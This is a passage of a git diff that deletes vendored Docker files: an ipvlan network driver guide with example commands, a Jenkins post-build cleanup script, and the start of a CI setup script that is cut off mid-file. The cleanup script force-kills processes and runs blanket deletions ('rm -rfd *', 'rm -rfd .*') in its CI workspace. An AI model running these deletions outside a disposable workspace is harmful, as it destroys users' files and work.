-Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios.
-
-### Pre-Requisites
-
-- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental)
-
-- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples.
-
-- Kernel requirements:
- 
- - To check your current kernel version, use `uname -r` to display your kernel version
- - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy)
-
-### Ipvlan L2 Mode Example Usage
-
-The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`.
-
-![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png)
-
-The parent interface in the next example `-o parent=eth0` is configured as followed:
-
-```
-ip addr show eth0
-3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
-    inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0
-```
-
-Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option.
-
-Create the ipvlan network and run a container attaching to it:
-
-```
-# Ipvlan  (-o ipvlan_mode= Defaults to L2 mode if not specified)
-docker network  create -d ipvlan \
-    --subnet=192.168.1.0/24 \ 
-    --gateway=192.168.1.1 \
-    -o ipvlan_mode=l2 \
-    -o parent=eth0 db_net
-
-# Start a container on the db_net network
-docker  run --net=db_net -it --rm alpine /bin/sh
-
-# NOTE: the containers can NOT ping the underlying host interfaces as
-# they are intentionally filtered by Linux for additional isolation.
-```
-
-The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`.
-
-To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode.
-
-![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png)
-
-The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`.
-
-```
-# Ipvlan  (-o ipvlan_mode= Defaults to L2 mode if not specified)
-docker network  create -d ipvlan \
-    --subnet=192.168.1.0/24 \ 
-    -o parent=eth0 db_net_ipv
-
-# Start a container with an explicit name in daemon mode
-docker  run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh
-
-# Start a second container and ping using the container name
-# to see the docker included name resolution functionality
-docker  run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh
-ping -c 4 ipv1
-
-# NOTE: the containers can NOT ping the underlying host interfaces as
-# they are intentionally filtered by Linux for additional isolation.
-```
-
-The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely.
-
-The following two `docker network create` examples result in identical networks that you can attach container to:
-
-```
-# Empty '-o parent=' creates an isolated network
-docker network  create -d ipvlan \
-    --subnet=192.168.10.0/24 isolated1
-
-# Explicit '--internal' flag is the same:
-docker network  create -d ipvlan \
-    --subnet=192.168.11.0/24 --internal isolated2
-
-# Even the '--subnet=' can be left empty and the default 
-# IPAM subnet of 172.18.0.0/16 will be assigned
-docker network  create -d ipvlan isolated3
-
-docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh
-docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh
-docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh
-
-# To attach to any use `docker exec` and start a shell
-docker exec -it cid1 /bin/sh
-docker exec -it cid2 /bin/sh
-docker exec -it cid3 /bin/sh
-```
-
-### Ipvlan 802.1q Trunk L2 Mode Example Usage
-
-Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations.
-
-Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. VLANs or the equivocal VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic.
-
-![Docker VLANs in Depth](images/vlans-deeper-look.png)
-
-The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0.
-
-For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. 
-
-The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user.
-
-For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`.
-
-The example creates the vlan tagged networks and then start two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host.
-
-**Vlan ID 20**
-
-In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink.
-
-```
-# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
-docker network  create  -d ipvlan \
-    --subnet=192.168.20.0/24 \
-    --gateway=192.168.20.1 \
-    -o parent=eth0.20 ipvlan20
-
-# in two separate terminals, start a Docker container and the containers can now ping one another.
-docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh
-docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh
-```
-
-**Vlan ID 30**
-
-In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example.
-
-```
-# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged.
-docker network  create  -d ipvlan \
-    --subnet=192.168.30.0/24 \
-    --gateway=192.168.30.1 \
-    -o parent=eth0.30 \
-    -o ipvlan_mode=l2 ipvlan30
-
-# in two separate terminals, start a Docker container and the containers can now ping one another.
-docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh
-docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh
-```
-
-The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network.
-
-```
-$ ip route
-  default via 192.168.30.1 dev eth0
-  192.168.30.0/24 dev eth0  src 192.168.30.2
-```
-
-Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. 
-
-Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI).
-
-```
-docker network  create  -d ipvlan \
-    --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \
-    --gateway=192.168.114.254  --gateway=192.168.116.254 \
-     -o parent=eth0.114 \
-     -o ipvlan_mode=l2 ipvlan114
-     
-docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh
-docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh
-```
-
-A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network.
-
-An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. Example mappings from NetOps to Docker network commands are as follows:
-
-- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1
-
-    - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` 
-
-- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1
-
-    - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` 
-
-- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1
-
-    - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` 
-
-### IPVlan L3 Mode Example
-
-IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples.
-
-![Docker Ipvlan L2 Mode](images/ipvlan-l3.png)
-
-Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Port Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs (top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 modes is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. 
-
-- L3 mode needs to be on a separate subnet as the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface.
-
-- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`.
-
-- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`.
-
-```
-ip a show eth0
-3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
-    link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff
-    inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0
-```
-
--A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply point the the containers `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details.
-
-The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`.
-
-The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather then rejecting the network creation and isolating containers from only communicating with one another.
-
-```
-# Create the Ipvlan L3 network
-docker network  create  -d ipvlan \
-    --subnet=192.168.214.0/24 \
-    --subnet=10.1.214.0/24 \
-     -o ipvlan_mode=l3 ipnet210
-
-# Test 192.168.214.0/24 connectivity
-docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh
-docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh
-
-# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24
-docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10
-
-# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24
-docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10
-
-```
-
-Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container:
-
-```
-# Inside an L3 mode container
-$ ip route
-  default dev eth0
-  192.168.120.0/24 dev eth0  src 192.168.120.2
-```
-
-In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story.
-
-### Dual Stack IPv4 IPv6 Ipvlan L2 Mode
-
-- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families.
-
-- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`.
-
-```
-# Create a v6 network
-docker network create -d ipvlan \
-    --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \
-    -o parent=eth0.139 v6ipvlan139
-    
-# Start a container on the network
-docker run --net=v6ipvlan139 -it --rm alpine /bin/sh
-
-```
-
-View the container eth0 interface and v6 routing table:
-
-```
- eth0@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
-    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
-    inet 172.18.0.2/16 scope global eth0
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc2::1/64 scope link nodad
-       valid_lft forever preferred_lft forever
-       
-root@5c1dc74b1daa:/# ip -6 route
-2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
-2001:db8:abc2::/64 dev eth0  proto kernel  metric 256
-default via 2001:db8:abc2::22 dev eth0  metric 1024
-```
-
-Start a second container and ping the first container's v6 address. 
-
-```
-$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh
-
-root@b817e42fcc54:/# ip a show eth0
-75: eth0@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
-    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
-    inet 172.18.0.3/16 scope global eth0
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc2::2/64 scope link nodad
-       valid_lft forever preferred_lft forever
-
-root@b817e42fcc54:/# ping6 2001:db8:abc2::1
-PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes
-64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms
-64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms
-
-2 packets transmitted, 2 packets received, 0% packet loss
-round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms
-```
-
-The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`.
-
-Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways:
-
-```
-docker network  create  -d ipvlan \
-    --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \
-    --gateway=192.168.140.1  --gateway=192.168.142.1 \
-    --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \
-     -o parent=eth0.140 \
-     -o ipvlan_mode=l2 ipvlan140
-```
-
-Start a container and view eth0 and both v4 & v6 routing tables:
-
-```
-docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh
-
-root@3cce0d3575f3:/# ip a show eth0
-78: eth0@if77: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
-    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
-    inet 192.168.140.2/24 scope global eth0
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc9::1/64 scope link nodad
-       valid_lft forever preferred_lft forever
-
-root@3cce0d3575f3:/# ip route
-default via 192.168.140.1 dev eth0
-192.168.140.0/24 dev eth0  proto kernel  scope link  src 192.168.140.2
-
-root@3cce0d3575f3:/# ip -6 route
-2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
-2001:db8:abc9::/64 dev eth0  proto kernel  metric 256
-default via 2001:db8:abc9::22 dev eth0  metric 1024
-```
-
-Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets:
-
-```
-docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh
-```
-
-**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link.
-
-### Dual Stack IPv4 IPv6 Ipvlan L3 Mode 
-
-**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118
-
-As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback.
-
-The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets.
-
-```
-# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network 
-# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0'
-docker network  create  -d ipvlan \
-    --subnet=192.168.110.0/24 \
-    --subnet=192.168.112.0/24 \
-    --subnet=2001:db8:abc6::/64 \
-     -o parent=eth0 \
-     -o ipvlan_mode=l3 ipnet110
-
-
-# Start a few of containers on the network (ipnet110) 
-# in separate terminals and check connectivity
-docker run --net=ipnet110 -it --rm alpine /bin/sh
-# Start a second container specifying the v6 address
-docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh
-# Start a third specifying the IPv4 address
-docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh
-# Start a 4th specifying both the IPv4 and IPv6 addresses
-docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh
-```
-
-Interface and routing table outputs are as follows:
-
-```
-root@3a368b2a982e:/# ip a show eth0
-63: eth0@if59: <BROADCAST,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
-    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
-    inet 192.168.112.2/24 scope global eth0
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
-       valid_lft forever preferred_lft forever
-    inet6 2001:db8:abc6::10/64 scope link nodad
-       valid_lft forever preferred_lft forever
-     
-# Note the default route is simply the eth device because ARPs are filtered.
-root@3a368b2a982e:/# ip route
-  default dev eth0  scope link
-  192.168.112.0/24 dev eth0  proto kernel  scope link  src 192.168.112.2
-
-root@3a368b2a982e:/# ip -6 route
-2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
-2001:db8:abc6::/64 dev eth0  proto kernel  metric 256
-default dev eth0  metric 1024
-```
-
-*Note:* There may be a bug when specifying `--ip6=` addresses when you delete a container with a specified v6 address and then start a new container with the same v6 address it throws the following like the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead.
-
-```
-docker: Error response from daemon: Address already in use.
-```
-
-### Manually Creating 802.1q Links
-
-**Vlan ID 40**
-
-If a user does not want the driver to create the vlan sub-interface it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and us up.
-
-Links if manually created can be named anything you want. As long as the exist when the network is created that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`.
-
-```
-# create a new sub-interface tied to dot1q vlan 40
-ip link add link eth0 name eth0.40 type vlan id 40
-
-# enable the new sub-interface
-ip link set eth0.40 up
-
-# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
-docker network  create  -d ipvlan \
-   --subnet=192.168.40.0/24 \
-   --gateway=192.168.40.1 \
-   -o parent=eth0.40 ipvlan40
-
-# in two separate terminals, start a Docker container and the containers can now ping one another.
-docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh
-docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh
-```
-
-**Example:** Vlan sub-interface manually created with any name:
-
-```
-# create a new sub interface tied to dot1q vlan 40
-ip link add link eth0 name foo type vlan id 40
-
-# enable the new sub-interface
-ip link set foo up
-
-# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
-docker network  create  -d ipvlan \
-    --subnet=192.168.40.0/24 --gateway=192.168.40.1 \
-    -o parent=foo ipvlan40
-
-# in two separate terminals, start a Docker container and the containers can now ping one another.
-docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh
-docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh
-```
-
-Manually created links can be cleaned up with:
-
-```
-ip link del foo
-```
-
-As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user.
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
deleted file mode 100644
index 662e2dcc37..0000000000
--- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
+++ /dev/null
@@ -1,35 +0,0 @@
-set +x
-set +e 
-
-echo ""
-echo ""
-echo "---"
-echo "Now starting POST-BUILD steps"
-echo "---"
-echo ""
-
-echo INFO: Pointing to $DOCKER_HOST
-
-if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then
-	echo INFO: Removing containers...
-	! docker rm -vf $(docker ps -aq)
-fi
-
-# Remove all images which don't have docker or debian in the name
-if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then 
-	echo INFO: Removing images...
-	! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') 
-fi
-
-# Kill off any instances of git, go and docker, just in case
-! taskkill -F -IM git.exe -T >& /dev/null
-! taskkill -F -IM go.exe -T >& /dev/null
-! taskkill -F -IM docker.exe -T >& /dev/null
-
-# Remove everything
-! cd /c/jenkins/gopath/src/github.com/docker/docker
-! rm -rfd * >& /dev/null
-! rm -rfd .* >& /dev/null
-
-echo INFO: Cleanup complete
-exit 0
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
deleted file mode 100644
index 30e5884d97..0000000000
--- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
+++ /dev/null
@@ -1,309 +0,0 @@
-# Jenkins CI script for Windows to Linux CI.
-# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable.
-set +xe
-SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016"
-
-# TODO to make (even) more resilient: 
-#  - Wait for daemon to be running before executing docker commands
-#  - Check if jq is installed
-#  - Make sure bash is v4.3 or later. Can't do until all Azure nodes on the latest version
-#  - Make sure we are not running as local system. Can't do until all Azure nodes are updated.
-#  - Error if docker versions are not equal. Can't do until all Azure nodes are updated
-#  - Error if go versions are not equal. Can't do until all Azure nodes are updated.
-#  - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64"
-#  - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind
-#  - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP
-#  - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason
-#    for doing that is that it mirrors the actual release process for docker.exe which is cross-built.
-#    However, should absolutely not be a problem if built natively, so nit-picking.
-#  - Tidy up of images and containers. Either here, or in the teardown script.
-
-ec=0
-uniques=1
-echo INFO: Started at `date`. Script version $SCRIPT_VER
-
-
-# !README!
-# There are two daemons running on the remote Linux host:
-# 	- outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon
-#			from the sources matching the PR.
-#	- inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted
-#			(2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376).
-#			The windows integration tests are run against this inner daemon.
-
-# get the ip, inner and outer ports.
-ip="${DOCKER_HOST#*://}"
-port_outer="${ip#*:}"
-# inner port is like outer port with last two digits inverted.
-port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/')
-ip="${ip%%:*}"
-
-echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner"
-
-# If TLS is enabled
-if [ -n "$DOCKER_TLS_VERIFY" ]; then
-	protocol=https
-	if [ -z "$DOCKER_MACHINE_NAME" ]; then
-		ec=1
-		echo "ERROR: DOCKER_MACHINE_NAME is undefined"
-	fi
-	certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME)
-	curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem"
-	run_extra_args="-v tlscerts:/etc/docker"
-	daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem"
-else
-	protocol=http
-fi
-
-# Save for use by make.sh and scripts it invokes
-export MAIN_DOCKER_HOST="tcp://$ip:$port_inner"
-
-# Verify we can get the remote node to respond to _ping
-if [ $ec -eq 0 ]; then
-	reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping`
-	if [ "$reply" != "OK" ]; then
-		ec=1
-		echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node"
-		echo "       at $ip:$port_outer when called with an http request for '_ping'. This implies that"
-		echo "       either the daemon has crashed/is not running, or the Linux node is unavailable."
-		echo
-		echo "       A regular ping to the remote Linux node is below. It should reply. If not, the"
-		echo "       machine cannot be reached at all and may have crashed. If it does reply, it is"
-		echo "       likely a case of the Linux daemon not running or having crashed, which requires"
-		echo "       further investigation."
-		echo
-		echo "       Try re-running this CI job, or ask on #docker-dev or #docker-maintainers"
-		echo "       for someone to perform further diagnostics, or take this node out of rotation."
-		echo
-		ping $ip
-	else
-		echo "INFO: The Linux nodes outer daemon replied to a ping. Good!"
-	fi 
-fi
-
-# Get the version from the remote node. Note this may fail if jq is not installed.
-# That's probably worth checking to make sure, just in case.
-if [ $ec -eq 0 ]; then
-	remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'`
-	echo "INFO: Remote daemon is running docker version $remoteVersion"
-fi
-
-# Compare versions. We should really fail if result is no 1. Output at end of script.
-if [ $ec -eq 0 ]; then
-	uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l`
-fi
-
-# Make sure we are in repo
-if [ $ec -eq 0 ]; then
-	if [ ! -d hack ]; then
-		echo "ERROR: Are you sure this is being launched from a the root of docker repository?"
-		echo "       If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker."
-                echo "       Current directory is `pwd`"
-		ec=1
-	fi
-fi
-
-# Are we in split binary mode?
-if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then
-    splitBinary=0
-	echo "INFO: Running in single binary mode"
-else
-    splitBinary=1
-	echo "INFO: Running in split binary mode"
-fi
-
-
-# Get the commit has and verify we have something
-if [ $ec -eq 0 ]; then
-	export COMMITHASH=$(git rev-parse --short HEAD)
-	echo INFO: Commmit hash is $COMMITHASH
-	if [ -z $COMMITHASH ]; then
-		echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?"
-		ec=1
-	fi
-fi
-
-# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not
-# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment
-# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which
-# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system...
-if [ $ec -eq 0 ]; then
-	export TEMP=/c/CI/CI-$COMMITHASH
-	export TMP=$TEMP
-	/usr/bin/mkdir -p $TEMP  # Make sure Linux mkdir for -p
-fi
-
-# Tidy up time
-if [ $ec -eq 0 ]; then
-	echo INFO: Deleting pre-existing containers and images...
-    
-	# Force remove all containers based on a previously built image with this commit
-	! docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null
-    
-	# Force remove any container with this commithash as a name
-	! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null
-
-	# This SHOULD never happen, but just in case, also blow away any containers
-	# that might be around.
